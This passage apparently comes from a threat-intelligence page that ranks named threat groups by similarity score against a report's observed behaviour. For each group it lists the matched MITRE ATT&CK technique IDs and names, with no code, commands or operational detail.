  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1555.004 - Windows Credential Manager
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service

APT42

Score: 16.61
Matched TTPs:
  • T1056.001 - Keylogging
  • T1608.001 - Upload Malware
  • T1070.008 - Clear Mailbox Data
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1111 - Multi-Factor Authentication Interception
  • T1071.001 - Web Protocols

HEXANE

Score: 27.49
Matched TTPs:
  • T1056.001 - Keylogging
  • T1016.001 - Internet Connection Discovery
  • T1583.002 - DNS Server
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1534 - Internal Spearphishing
  • T1102.002 - Bidirectional Communication
  • T1018 - Remote System Discovery
  • T1518 - Software Discovery

APT32

Score: 40.29
Matched TTPs:
  • T1056.001 - Keylogging
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1071.003 - Mail Protocols
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1068 - Exploitation for Privilege Escalation
  • T1036.003 - Rename Legitimate Utilities
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link

Andariel

Score: 12.40
Matched TTPs:
  • T1590.005 - IP Addresses
  • T1005 - Data from Local System
  • T1592.002 - Software
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise

TA551

Score: 7.66
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1218.005 - Mshta
  • T1071.001 - Web Protocols

APT29

Score: 60.70
Matched TTPs:
  • T1016.001 - Internet Connection Discovery
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1090.002 - External Proxy
  • T1546.008 - Accessibility Features
  • T1568 - Dynamic Resolution
  • T1098.005 - Device Registration
  • T1218.005 - Mshta
  • T1021.007 - Cloud Services
  • T1583.006 - Web Services
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1027.006 - HTML Smuggling
  • T1665 - Hide Infrastructure
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service

Gamaredon Group

Score: 42.26
Matched TTPs:
  • T1016.001 - Internet Connection Discovery
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1568 - Dynamic Resolution
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1102.003 - One-Way Communication
  • T1534 - Internal Spearphishing
  • T1090.003 - Multi-hop Proxy
  • T1562.001 - Disable or Modify Tools
  • T1001 - Data Obfuscation
  • T1039 - Data from Network Shared Drive
  • T1102.002 - Bidirectional Communication
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link

TA2541

Score: 15.51
Matched TTPs:
  • T1016.001 - Internet Connection Discovery
  • T1608.001 - Upload Malware
  • T1568 - Dynamic Resolution
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1204.001 - Malicious Link

ZIRCONIUM

Score: 27.83
Matched TTPs:
  • T1584.008 - Network Devices
  • T1598.003 - Spearphishing Link
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1090.003 - Multi-hop Proxy
  • T1068 - Exploitation for Privilege Escalation
  • T1102.002 - Bidirectional Communication
  • T1598 - Phishing for Information
  • T1665 - Hide Infrastructure
  • T1204.001 - Malicious Link
Link to MITRE →

Leviathan

Score: 33.64
Matched TTPs:
  • T1584.008 - Network Devices
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1102.003 - One-Way Communication
  • T1534 - Internal Spearphishing
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1584.004 - Server
  • T1204.001 - Malicious Link
Link to MITRE →

Mustard Tempest

Score: 12.92
Matched TTPs:
  • T1583.008 - Malvertising
  • T1608.001 - Upload Malware
  • T1583.004 - Server
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
Link to MITRE →

Daggerfly

Score: 13.02
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1036.003 - Rename Legitimate Utilities
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1204.001 - Malicious Link
Link to MITRE →

Dragonfly

Score: 42.67
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1598.003 - Spearphishing Link
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1591.002 - Business Relationships
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1598.002 - Spearphishing Attachment
  • T1071.002 - File Transfer Protocols
  • T1210 - Exploitation of Remote Services
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
Link to MITRE →

Axiom

Score: 18.35
Matched TTPs:
  • T1583.002 - DNS Server
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1546.008 - Accessibility Features
  • T1584.005 - Botnet
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
Link to MITRE →

LazyScripter

Score: 10.43
Matched TTPs:
  • T1071.004 - DNS
  • T1608.001 - Upload Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1204.001 - Malicious Link
Link to MITRE →

Cobalt Group

Score: 19.90
Matched TTPs:
  • T1071.004 - DNS
  • T1219 - Remote Access Tools
  • T1218.003 - CMSTP
  • T1572 - Protocol Tunneling
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
Link to MITRE →

Tropic Trooper

Score: 22.23
Matched TTPs:
  • T1071.004 - DNS
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1052.001 - Exfiltration over USB
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1518 - Software Discovery
Link to MITRE →

APT18

Score: 6.66
Matched TTPs:
  • T1071.004 - DNS
  • T1083 - File and Directory Discovery
  • T1078 - Valid Accounts
  • T1071.001 - Web Protocols
Link to MITRE →

FIN7

Score: 37.75
Matched TTPs:
  • T1071.004 - DNS
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1572 - Protocol Tunneling
  • T1562.004 - Disable or Modify System Firewall
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1102.002 - Bidirectional Communication
  • T1204.001 - Malicious Link
Link to MITRE →

Winter Vivern

Score: 23.22
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1056.003 - Web Portal Capture
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
Link to MITRE →

Moonstone Sleet

Score: 19.77
Matched TTPs:
  • T1587.001 - Malware
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1486 - Data Encrypted for Impact
  • T1598 - Phishing for Information
  • T1071.001 - Web Protocols
  • T1566.003 - Spearphishing via Service
Link to MITRE →

LuminousMoth

Score: 13.21
Matched TTPs:
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1083 - File and Directory Discovery
  • T1608.005 - Link Target
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
Link to MITRE →

Salt Typhoon

Score: 19.85
Matched TTPs:
  • T1587.001 - Malware
  • T1040 - Network Sniffing
  • T1590.004 - Network Topology
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1602.002 - Network Device Configuration Dump
  • T1562.004 - Disable or Modify System Firewall
Link to MITRE →

Aoqin Dragon

Score: 7.12
Matched TTPs:
  • T1587.001 - Malware
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
Link to MITRE →

Moses Staff

Score: 9.14
Matched TTPs:
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
Link to MITRE →

TeamTNT

Score: 37.88
Matched TTPs:
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1071 - Application Layer Protocol
  • T1608.001 - Upload Malware
  • T1219 - Remote Access Tools
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1610 - Deploy Container
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1048 - Exfiltration Over Alternative Protocol
  • T1562.001 - Disable or Modify Tools
  • T1595.001 - Scanning IP Blocks
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
Link to MITRE →

Scattered Spider

Score: 56.76
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1598.003 - Spearphishing Link
  • T1070.008 - Clear Mailbox Data
  • T1572 - Protocol Tunneling
  • T1589 - Gather Victim Identity Information
  • T1598.004 - Spearphishing Voice
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1021.007 - Cloud Services
  • T1204 - User Execution
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1486 - Data Encrypted for Impact
  • T1598 - Phishing for Information
  • T1213.003 - Code Repositories
  • T1018 - Remote System Discovery
  • T1538 - Cloud Service Dashboard
  • T1003.003 - NTDS
Link to MITRE →

Storm-0501

Score: 13.88
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1190 - Exploit Public-Facing Application
  • T1036.004 - Masquerade Task or Service
  • T1021.007 - Cloud Services
  • T1486 - Data Encrypted for Impact
Link to MITRE →

FIN6

Score: 27.02
Matched TTPs:
  • T1213.006 - Databases
  • T1005 - Data from Local System
  • T1572 - Protocol Tunneling
  • T1036.004 - Masquerade Task or Service
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1134 - Access Token Manipulation
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
  • T1566.003 - Spearphishing via Service
Link to MITRE →

Sidewinder

Score: 17.98
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
  • T1204.001 - Malicious Link
Link to MITRE →

Silent Librarian

Score: 10.01
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1585.002 - Email Accounts
  • T1608.005 - Link Target
  • T1078 - Valid Accounts
Link to MITRE →

CURIUM

Score: 19.15
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1005 - Data from Local System
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1585.002 - Email Accounts
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
  • T1566.003 - Spearphishing via Service
Link to MITRE →

Patchwork

Score: 13.11
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
  • T1102.001 - Dead Drop Resolver
Link to MITRE →

admin@338

Score: 6.79
Matched TTPs:
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
Link to MITRE →

Velvet Ant

Score: 17.07
Matched TTPs:
  • T1040 - Network Sniffing
  • T1071 - Application Layer Protocol
  • T1562.004 - Disable or Modify System Firewall
  • T1083 - File and Directory Discovery
  • T1562.001 - Disable or Modify Tools
  • T1570 - Lateral Tool Transfer
  • T1090.001 - Internal Proxy
Link to MITRE →

DarkVishnya

Score: 7.39
Matched TTPs:
  • T1040 - Network Sniffing
  • T1219 - Remote Access Tools
  • T1046 - Network Service Discovery
Link to MITRE →

Rocke

Score: 20.96
Matched TTPs:
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1055.002 - Portable Executable Injection
  • T1562.001 - Disable or Modify Tools
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1102.001 - Dead Drop Resolver
Link to MITRE →

LAPSUS$

Score: 40.13
Matched TTPs:
  • T1005 - Data from Local System
  • T1589 - Gather Victim Identity Information
  • T1598.004 - Spearphishing Voice
  • T1591.002 - Business Relationships
  • T1593.003 - Code Repositories
  • T1090 - Proxy
  • T1204 - User Execution
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1584.002 - DNS Server
  • T1213.003 - Code Repositories
  • T1111 - Multi-Factor Authentication Interception
  • T1003.003 - NTDS
Link to MITRE →

Windigo

Score: 9.60
Matched TTPs:
  • T1005 - Data from Local System
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery
Link to MITRE →

APT37

Score: 8.29
Matched TTPs:
  • T1005 - Data from Local System
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
Link to MITRE →

Inception

Score: 13.26
Matched TTPs:
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1090.003 - Multi-hop Proxy
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
Link to MITRE →

Stealth Falcon

Score: 7.73
Matched TTPs:
  • T1005 - Data from Local System
  • T1016 - System Network Configuration Discovery
  • T1555.004 - Windows Credential Manager
  • T1071.001 - Web Protocols
Link to MITRE →

Dark Caracal

Score: 8.22
Matched TTPs:
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1566.003 - Spearphishing via Service
Link to MITRE →

BlackByte

Score: 34.26
Matched TTPs:
  • T1562 - Impair Defenses
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1134.003 - Make and Impersonate Token
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
Link to MITRE →

SideCopy

Score: 12.15
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1518 - Software Discovery
Link to MITRE →

TA505

Score: 8.66
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1562.001 - Disable or Modify Tools
  • T1486 - Data Encrypted for Impact
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
Link to MITRE →

BITTER

Score: 15.75
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1568 - Dynamic Resolution
  • T1036.004 - Masquerade Task or Service
  • T1068 - Exploitation for Privilege Escalation
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
Link to MITRE →

Saint Bear

Score: 8.64
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1203 - Exploitation for Client Execution
  • T1204.001 - Malicious Link
Link to MITRE →

EXOTIC LILY

Score: 13.48
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1585.002 - Email Accounts
  • T1593.001 - Social Media
  • T1203 - Exploitation for Client Execution
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
Link to MITRE →

BackdoorDiplomacy

Score: 7.10
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1036.004 - Masquerade Task or Service
  • T1046 - Network Service Discovery
Link to MITRE →

GOLD SOUTHFIELD

Score: 4.06
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
Link to MITRE →

BlackTech

Score: 6.09
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1203 - Exploitation for Client Execution
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
Link to MITRE →

Medusa Group

Score: 41.29
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1608.002 - Upload Tool
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1090.003 - Multi-hop Proxy
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1650 - Acquire Access
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
Link to MITRE →

Cinnamon Tempest

Score: 7.76
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1090 - Proxy
  • T1078 - Valid Accounts
Link to MITRE →

Blue Mockingbird

Score: 7.66
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1090 - Proxy
  • T1134 - Access Token Manipulation
Link to MITRE →

Volatile Cedar

Score: 5.83
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
Link to MITRE →

Carbanak

Score: 10.85
Matched TTPs:
  • T1219 - Remote Access Tools
  • T1562.004 - Disable or Modify System Firewall
  • T1036.004 - Masquerade Task or Service
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
Link to MITRE →

MoustachedBouncer

Score: 8.97
Matched TTPs:
  • T1659 - Content Injection
  • T1090 - Proxy
  • T1068 - Exploitation for Privilege Escalation
Link to MITRE →

Higaisa

Score: 13.71
Matched TTPs:
  • T1029 - Scheduled Transfer
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1090.001 - Internal Proxy
Link to MITRE →

SilverTerrier

Score: 8.09
Matched TTPs:
  • T1071.003 - Mail Protocols
  • T1071.002 - File Transfer Protocols
  • T1071.001 - Web Protocols
Link to MITRE →

Deep Panda

Score: 6.59
Matched TTPs:
  • T1505.003 - Web Shell
  • T1546.008 - Accessibility Features
  • T1018 - Remote System Discovery
Link to MITRE →

FIN5

Score: 5.71
Matched TTPs:
  • T1090.002 - External Proxy
  • T1078 - Valid Accounts
  • T1018 - Remote System Discovery
Link to MITRE →

Silence

Score: 5.71
Matched TTPs:
  • T1090.002 - External Proxy
  • T1078 - Valid Accounts
  • T1018 - Remote System Discovery
Link to MITRE →

APT19

Score: 4.42
Matched TTPs:
  • T1016 - System Network Configuration Discovery
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
Link to MITRE →

Naikon

Score: 6.87
Matched TTPs:
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
Link to MITRE →

POLONIUM

Score: 8.18
Matched TTPs:
  • T1090 - Proxy
  • T1583.006 - Web Services
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
Link to MITRE →

Confucius

Score: 9.69
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
Link to MITRE →

Leafminer

Score: 6.37
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1189 - Drive-by Compromise
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
Link to MITRE →

RedEcho

Score: 4.47
Matched TTPs:
  • T1568 - Dynamic Resolution
  • T1071.001 - Web Protocols
Link to MITRE →

Transparent Tribe

Score: 7.90
Matched TTPs:
  • T1568 - Dynamic Resolution
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
Link to MITRE →

PROMETHIUM

Score: 7.99
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1205.001 - Port Knocking
  • T1189 - Drive-by Compromise
Link to MITRE →

Gorgon Group

Score: 5.93
Matched TTPs:
  • T1055.002 - Portable Executable Injection
  • T1562.001 - Disable or Modify Tools
Link to MITRE →

APT17

Score: 5.45
Matched TTPs:
  • T1583.006 - Web Services
  • T1585 - Establish Accounts
Link to MITRE →

TA578

Score: 3.37
Matched TTPs:
  • T1583.006 - Web Services
  • T1204.001 - Malicious Link
Link to MITRE →

Suckfly

Score: 3.19
Matched TTPs:
  • T1078 - Valid Accounts
  • T1046 - Network Service Discovery
Link to MITRE →

FIN10

Score: 3.66
Matched TTPs:
  • T1078 - Valid Accounts
  • T1570 - Lateral Tool Transfer
Link to MITRE →

Storm-1811

Score: 7.10
Matched TTPs:
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1566.003 - Spearphishing via Service
Link to MITRE →

APT12

Score: 3.89
Matched TTPs:
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
Link to MITRE →

Elderwood

Score: 4.62
Matched TTPs:
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
Link to MITRE →

RTM

Score: 5.05
Matched TTPs:
  • T1189 - Drive-by Compromise
  • T1102.001 - Dead Drop Resolver
Link to MITRE →

Windshift

Score: 9.58
Matched TTPs:
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
Link to MITRE →

Machete

Score: 3.13
Matched TTPs:
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
Link to MITRE →

Equation

Score: 4.13
Matched TTPs:
  • T1564.005 - Hidden File System
Link to MITRE →

Strider

Score: 7.06
Matched TTPs:
  • T1564.005 - Hidden File System
  • T1090.001 - Internal Proxy
Link to MITRE →

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1071.003 - Mail Protocols
  • T1593.001 - Social Media
  • T1583.006 - Web Services
  • T1560.001 - Archive via Utility
  • T1071.002 - File Transfer Protocols
  • T1102.001 - Dead Drop Resolver
  • T1534 - Internal Spearphishing
  • T1016 - System Network Configuration Discovery
  • T1608.001 - Upload Malware
  • T1583.004 - Server
  • T1005 - Data from Local System
  • T1040 - Network Sniffing
  • T1583 - Acquire Infrastructure
  • T1218.005 - Mshta
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1598.003 - Spearphishing Link
  • T1585 - Establish Accounts
  • T1056.001 - Keylogging
  • T1562.004 - Disable or Modify System Firewall
  • T1562.001 - Disable or Modify Tools
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1598 - Phishing for Information
  • T1083 - File and Directory Discovery
  • T1588.005 - Exploits
  • T1205 - Traffic Signaling
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1111 - Multi-Factor Authentication Interception
  • T1102.002 - Bidirectional Communication
  • T1036.004 - Masquerade Task or Service
  • T1585.002 - Email Accounts
Link to MITRE →

Magic Hound

Score: 0.68
Matched TTPs:
  • T1589 - Gather Victim Identity Information
  • T1583.006 - Web Services
  • T1018 - Remote System Discovery
  • T1560.001 - Archive via Utility
  • T1016 - System Network Configuration Discovery
  • T1046 - Network Service Discovery
  • T1189 - Drive-by Compromise
  • T1005 - Data from Local System
  • T1570 - Lateral Tool Transfer
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1486 - Data Encrypted for Impact
  • T1598.003 - Spearphishing Link
  • T1016.001 - Internet Connection Discovery
  • T1114.001 - Local Email Collection
  • T1056.001 - Keylogging
  • T1562.004 - Disable or Modify System Firewall
  • T1562.001 - Disable or Modify Tools
  • T1590.005 - IP Addresses
  • T1592.002 - Software
  • T1591.001 - Determine Physical Locations
  • T1083 - File and Directory Discovery
  • T1572 - Protocol Tunneling
  • T1090 - Proxy
  • T1573 - Encrypted Channel
  • T1562 - Impair Defenses
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1566.003 - Spearphishing via Service
  • T1102.002 - Bidirectional Communication
  • T1071 - Application Layer Protocol
  • T1036.004 - Masquerade Task or Service
  • T1585.002 - Email Accounts
Link to MITRE →

Sandworm Team

Score: 0.64
Matched TTPs:
  • T1499 - Endpoint Denial of Service
  • T1018 - Remote System Discovery
  • T1213.006 - Databases
  • T1608.001 - Upload Malware
  • T1583.004 - Server
  • T1003.003 - NTDS
  • T1005 - Data from Local System
  • T1570 - Lateral Tool Transfer
  • T1040 - Network Sniffing
  • T1583 - Acquire Infrastructure
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1486 - Data Encrypted for Impact
  • T1598.003 - Spearphishing Link
  • T1591.002 - Business Relationships
  • T1056.001 - Keylogging
  • T1587.001 - Malware
  • T1592.002 - Software
  • T1083 - File and Directory Discovery
  • T1090 - Proxy
  • T1491.002 - External Defacement
  • T1584.004 - Server
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
  • T1219 - Remote Access Tools
  • T1203 - Exploitation for Client Execution
  • T1585.002 - Email Accounts
  • T1584.005 - Botnet
Link to MITRE →

Volt Typhoon

Score: 0.61
Matched TTPs:
  • T1068 - Exploitation for Privilege Escalation
  • T1589 - Gather Victim Identity Information
  • T1018 - Remote System Discovery
  • T1560.001 - Archive via Utility
  • T1590.006 - Network Security Appliances
  • T1016 - System Network Configuration Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
  • T1005 - Data from Local System
  • T1570 - Lateral Tool Transfer
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1016.001 - Internet Connection Discovery
  • T1056.001 - Keylogging
  • T1070.007 - Clear Network Connection History and Configurations
  • T1590.004 - Network Topology
  • T1007 - System Service Discovery
  • T1083 - File and Directory Discovery
  • T1090.003 - Multi-hop Proxy
  • T1596.005 - Scan Databases
  • T1584.008 - Network Devices
  • T1090.001 - Internal Proxy
  • T1090 - Proxy
  • T1584.003 - Virtual Private Server
  • T1584.004 - Server
  • T1078 - Valid Accounts
  • T1518 - Software Discovery
  • T1584.005 - Botnet
Link to MITRE →

APT28

Score: 0.58
Matched TTPs:
  • T1071.003 - Mail Protocols
  • T1068 - Exploitation for Privilege Escalation
  • T1039 - Data from Network Shared Drive
  • T1583.006 - Web Services
  • T1560.001 - Archive via Utility
  • T1189 - Drive-by Compromise
  • T1090.002 - External Proxy
  • T1003.003 - NTDS
  • T1005 - Data from Local System
  • T1040 - Network Sniffing
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1598.003 - Spearphishing Link
  • T1056.001 - Keylogging
  • T1001.001 - Junk Data
  • T1598 - Phishing for Information
  • T1498 - Network Denial of Service
  • T1083 - File and Directory Discovery
  • T1090.003 - Multi-hop Proxy
  • T1584.008 - Network Devices
  • T1210 - Exploitation of Remote Services
  • T1092 - Communication Through Removable Media
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1102.002 - Bidirectional Communication
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
Link to MITRE →

Related CVEs

No CVEs were found in this Pulse.
